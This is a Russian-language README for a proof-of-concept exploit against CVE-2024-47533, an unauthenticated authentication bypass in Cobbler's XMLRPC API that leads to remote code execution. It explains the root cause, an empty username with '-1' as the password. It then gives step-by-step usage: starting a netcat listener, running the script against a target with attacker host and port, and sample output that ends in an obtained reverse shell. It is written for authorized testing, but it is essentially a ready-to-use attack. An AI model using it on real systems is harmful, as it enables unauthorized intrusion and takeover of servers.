
Доказательство концепции эксплуатации для CVE-2024-47533 — неаутентифицированный обход аутентификации в XMLRPC API Cobbler, приводящий к удалённому выполнению кода через внедрённую обратную оболочку.
Этот репозиторий содержит эксплойт Proof-of-Concept (PoC) для CVE-2024-47533,
критического обхода аутентификации в XMLRPC API Cobbler, приводящего к удаленному выполнению кода (RCE) без аутентификации.
Эксплойт использует уязвимость метода login() в XMLRPC API для обхода аутентификации и внедрения команды обратной оболочки через background_import().
Этот инструмент предназначен только для образовательных, исследовательских целей и авторизованного тестирования на проникновение.
НЕ используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.
Автор не несет ответственности за неправомерное использование или ущерб.
Основная причина:
utils.get_shared_secret() некорректно возвращает -1 из-за неправильной обработки чтения файла в бинарном режиме с кодировкой, что позволяет аутентификацию с пустым именем пользователя и -1 в качестве пароля.
Воздействие:
Злоумышленник может:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
На вашей атакующей машине:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Пример:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Скрипт эксплойта обратной оболочки
└── README.md # Документация
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
00xCanelo
Профиль GitHub